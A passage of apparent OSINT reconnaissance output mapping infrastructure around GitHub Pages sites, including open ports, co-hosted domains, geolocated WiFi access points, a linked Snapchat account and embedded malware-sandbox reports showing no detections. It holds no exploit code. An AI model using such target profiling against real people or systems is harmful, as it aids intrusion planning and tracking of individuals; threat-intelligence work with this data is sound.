u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dd4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "IsoScope_dd4_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_dd4_ConnHashTable<3540>_HashTable_Mutex"\n "IsoScope_dd4_IE_EarlyTabStart_0xc74_Mutex"\n "IsoScope_dd4_IESQMMUTEX_0_331"\n "IsoScope_dd4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3540"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "104.18.23.52:443"\n "142.250.191.74:443"\n "142.250.189.163:443"\n "45.57.91.1:443"\n "172.64.100.10:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"klliii.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "ka-f.fontawesome.com"\n "kit.fontawesome.com"\n "klliii.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"backgroun-img_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "children_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "everywhere_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "download_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "Logonetflix_1_.png" has type "PNG image data 2226 x 678 8-bit/color RGBA non-interlaced" and extension "png"\n "enjoy_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "free-fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "backgroun-img_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "children_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "o-0NIpQlx3QUlC5A4PNjThZlYA_1_.woff" has type "Web Open Font Format TrueType length 228112 version 1.1"- [targetUID: N/A]\n "o-0IIpQlx3QUlC5A4PNb4Q_1_.woff" has type "Web Open Font Format TrueType length 224624 version 1.1"- [targetUID: N/A]\n "everywhere_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "free-fa-regular-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "download_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "Logonetflix_1_.png" has type "PNG image data 2226 x 678 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003540]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF3E012FF382512C9A.TMP" has type "data"- Location: [%TEMP%\\~DF3E012FF382512C9A.TMP]- [targetUID: 00000000-00003540]\n "~DFDA4F25623C99390F.TMP" has type "data"- Location: [%TEMP%\\~DFDA4F25623C99390F.TMP]- [targetUID: 00000000-00003540]\n "~DF8521FB640F54F2EE.TMP" has type "data"- Location: [%TEMP%\\~DF8521FB640F54F2EE.TMP]- [targetUID: 00000000-00003540]\n "~DF8123E484044DA9B7.TMP" has type "data"- Location: [%TEMP%\\~DF8123E484044DA9B7.TMP]- [targetUID: 00000000-00003540]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "enjoy_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-556', u'name': u'Found strings related to keylogger', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1056/001', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-568', u'attck_id': u'T1056.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "< >"; File: "SSL")'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /clone-netflix/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://klliii.github.io/clone-netflix/"\n Pattern match: "http://klliii.github.io"\n Pattern match: "http://klliii.github.io/clone-netflix"\n Pattern match: "SUIDMmicrosoft.com/9216324768204831030537213959591431030420*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "SUIDMmicrosoft.com/9216324768204831030537213959591431030420*MUID27A7234A5F97654400D0304F5EDB649Amicrosoft.com/1025338017126431108891213975216431030420*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/video-tv-in-0819.m4v"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/video-devices-in.m4v"\n Pattern match: "https://kit.fontawesome.com/e5b8e6f1e4.js"\n Pattern match: "SUIDMmicrosoft.com/9216324768204831030537213959591431030420*MUID27A7234A5F97654400D0304F5EDB649Amicrosoft.com/1025338017126431108891213975216431030420*_EDGE_V1microsoft.com/9216338017126431108891213990841431030420*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "MUIDB27A7234A5F97654400D0304F5EDB649Aieonline.microsoft.com/9216338017126431108891213975216431030420*"\n Pattern match: "https://fonts.gstatic.com/s/notosans/v28/o-0NIpQlx3QUlC5A4PNjThZlYA.woff"\n Pattern match: "https://fonts.gstatic.com/s/notosans/v28/o-0IIpQlx3QUlC5A4PNb4Q.woff"\n Pattern match: "https://fonts.gstatic.com/s/notosanssylotinagri/v2 | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:5E:5C) | 41.8781, -87.6298 |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 109.48.229.35.bc.googleusercontent.com | 35.229.48.109 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00theway.github.io | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CHILDERS (Net ID: 00:09:5B:70:17:F2) | 39.0469, -77.4903 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PDI (Net ID: 00:06:25:FE:34:4D) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | venia1101 5 (Net ID: 00:01:9F:34:7C:24) | 34.0544, -118.244 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:443 | 104.21.71.14 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.203): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.net | route1.mx.cloudflare.net |
| 2023-05-12 03:09:28 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 02:54:54 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c552e7289ff8729-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2a06:98c1:3121::1 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Snapchat Stories (Category: social)
https://story.snapchat.com/s/ayshoo | ayshoo |
| 2023-05-12 02:44:24 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | oldfluid.battleb0t.xyz |
| 2023-05-12 02:44:14 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | pics.battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2096 | 188.114.97.1 |
| 2023-05-12 02:46:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://aegide.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7968:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7968:120:WilError_01"\n "Local\\SM0:8132:120:WilError_01"\n "Local\\SM0:8132:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:8132:120:WilError_01"\n "Local\\SM0:7968:120:WilError_01"\n "SM0:7968:120:WilError_01"\n "SM0:7968:304:WilStaging_02"\n "Local\\SM0:7968:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7968:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7968:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.217.164.106:443"\n "142.251.32.42:443"\n "142.251.214.131:443"\n "104.46.162.226:443"\n "199.232.208.194:443"\n "74.120.184.204:443"\n "151.101.2.91:443"\n "142.250.191.46:443"\n "18.155.181.126:443"\n "142.251.2.155:443"\n "192.184.69.215:443"\n "151.101.128.194:443"\n "172.217.12.104:443"\n "50.112.153.84:443"\n "104.22.4.69:443"\n "108.138.240.127:443"\n "18.155.181.48:443"\n "23.39.0.192:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.ad.gt"\n "ads.servenobid.com"\n "api.rlcdn.com"\n "d.turn.com"\n "eb2.3lift.com"\n "hbopenbid.pubmatic.com"\n "id.hadron.ad.gt"\n "idsync.rlcdn.com"\n "idx.liadm.com"\n "image2.pubmatic.com"\n "image8.pubmatic.com"\n "infinitefusion.fandom.com"\n "lexicon.33across.com"\n "p.ad.gt"\n "pippio.com"\n "pixel.tapad.com"\n "prebid-server.rubiconproject.com"\n "prebid.media.net"\n "rp.liadm.com"\n "s.amazon-adsystem.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007968]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00007968]\n "recovery-component-inner.crx" has type "Google Chrome extension version 3"- Location: [%TEMP%\\7968_773401145\\recovery-component-inner.crx]- [targetUID: 00000000-00007968]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\7968_1915048979\\Filtering Rules]- [targetUID: 00000000-00007968]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_2]- [targetUID: 00000000-00007968]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00007968]\n "59f9f8c0-2fcb-48a3-9c43-382eb668ab90.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 480998"- Location: [%TEMP%\\59f9f8c0-2fcb-48a3-9c43-382eb668ab90.tmp]- [targetUID: 00000000-00007968]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\7968_1915048979\\Filtering Rules-AA]- [targetUID: 00000000-00007968]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00007968]\n "f_000241" has type "gzip compressed data from Unix original size modulo 2^32 559102"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000241]- [targetUID: 00000000-00008172]\n "f_000254" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 558245"- [targetUID: N/A]\n "History" has type "SQLite 3.x database last written using SQLite version 3038005"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00008132]\n "f_000259" has type "gzip compressed data max compression original size modulo 2^32 406249"- [targetUID: N/A]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00007968]\n "f_000248" has type "gzip compressed data was "main.bundle.js" last modified: Wed Mar 29 09:20:53 2023 max compression from Unix original size modulo 2^32 631835"- [targetUID: N/A]\n "f_00024d" has type "gzip compressed data max compression from Unix original size modulo 2^32 360702"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 00000000-00008172]\n "f_000242" has type "gzip compressed data max compression from Unix original size modulo 2^32 494696"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000242]- [targetUID: 00000000-00008172]\n "f_000252" has type "data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://aegide.github.io/"\n Pattern match: "https://aegide.github.io"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://creativecommons.org/"\n Heuristic match: "a.ad.gt"\n Heuristic match: "ads.servenobid.com"\n Heuristic match: "api.rlcdn.com"\n Heuristic match: "d.turn.com"\n Heuristic match: "eb2.3lift.com"\n Heuristic match: "hbopenbid.pubmatic.com"\n Heuristic match: "id.hadron.ad.gt"\n Heuristic match: "idsync.rlcdn.com"\n Heuristic match: "idx.liadm.com"\n Heuristic match: "image2.pubmatic.com"\n Heuristic match: "image8.pubmatic.com"\n Heuristic match: "infinitefusion.fandom.com"\n Heuristic match: "lexicon.33across.com"\n Heuristic match: "p.ad.gt"\n Heuristic match: "pippio.com"\n Heuristic match: "pixel.tapad.com"\n Heuristic match: "prebid-server.rubiconproject.com"\n Heuristic match: "prebid.media.net"\n Heuristic match: "rp.liadm.com"\n Heuristic match: "s.amazon-adsystem.com"\n Heuristic match: "secure.adnxs.com"\n Heuristic match: "seg.ad.gt"\n Heuristic match: "services.fandom.com"\n Heuristic match: "sync.mathtag.com"\n Heuristic match: "token.rubiconproject.com"\n Pattern match: "www.fandom.com"\n Pattern match: "on.fandom.com/\'.\',\'\'ki/F_,k;;l__"\n Heuristic match: "egide.github.io"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.250.191.46"\n "UDP connection to 172.217.12.104"\n "UDP connection to 35.190.60.146"\n "UDP connection to 34.111.113.62"\n "UDP connection to 34.98.64.218"\n "UDP connection to 142.250.189.162"\n "UDP connection to 142.250.189.226"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"adblock_snippet.js" has type "Unknown"- Location: [%TEMP%\\7968_1915048979\\adblock_snippet.js]- [targetUID: 00000000-00007968]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'str | 185.199.111.153 |
| 2023-05-12 02:49:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://ovolve.github.io./', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c04_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_c04_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c04_IE_EarlyTabStart_0xc28_Mutex"\n "IsoScope_c04_ConnHashTable<3076>_HashTable_Mutex"\n "IsoScope_c04_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c04_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ovolve.github.io"\n "ovolve.github.io."'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ovolve.github.io."'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_E26CC892-B3FD-11ED-8DD4-080027C97B4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC2B4CC769FA8ED96.TMP" has type "data"- Location: [%TEMP%\\~DFC2B4CC769FA8ED96.TMP]- [targetUID: 00000000-00003076]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._DBBF5281-B3FD-11ED-8DD4-080027C97B4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003076]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFA990EBDE4D7AD6EC.TMP" has type "data"- Location: [%TEMP%\\~DFA990EBDE4D7AD6EC.TMP]- [targetUID: 00000000-00003076]\n "~DF2782969D76362D05.TMP" has type "data"- Location: [%TEMP%\\~DF2782969D76362D05.TMP]- [targetUID: 00000000-00003076]\n "DD371DTO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DD371DTO.txt]- [targetUID: 00000000-00003076]\n "~DF871B8F3038523BC2.TMP" has type "data"- Location: [%TEMP%\\~DF871B8F3038523BC2.TMP]- [targetUID: 00000000-00003076]\n "_DBBF5283-B3FD-11ED-8DD4-080027C97B4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "2JR14FFJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2JR14FFJ.txt]- [targetUID: 00000000-00003076]\n "ZPAGZOOJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZPAGZOOJ.txt]- [targetUID: 00000000-00003912]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://ovolve.github.io./"\n Pattern match: "http://ovolve.github.io"\n Heuristic match: "ovolve.github.io"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as 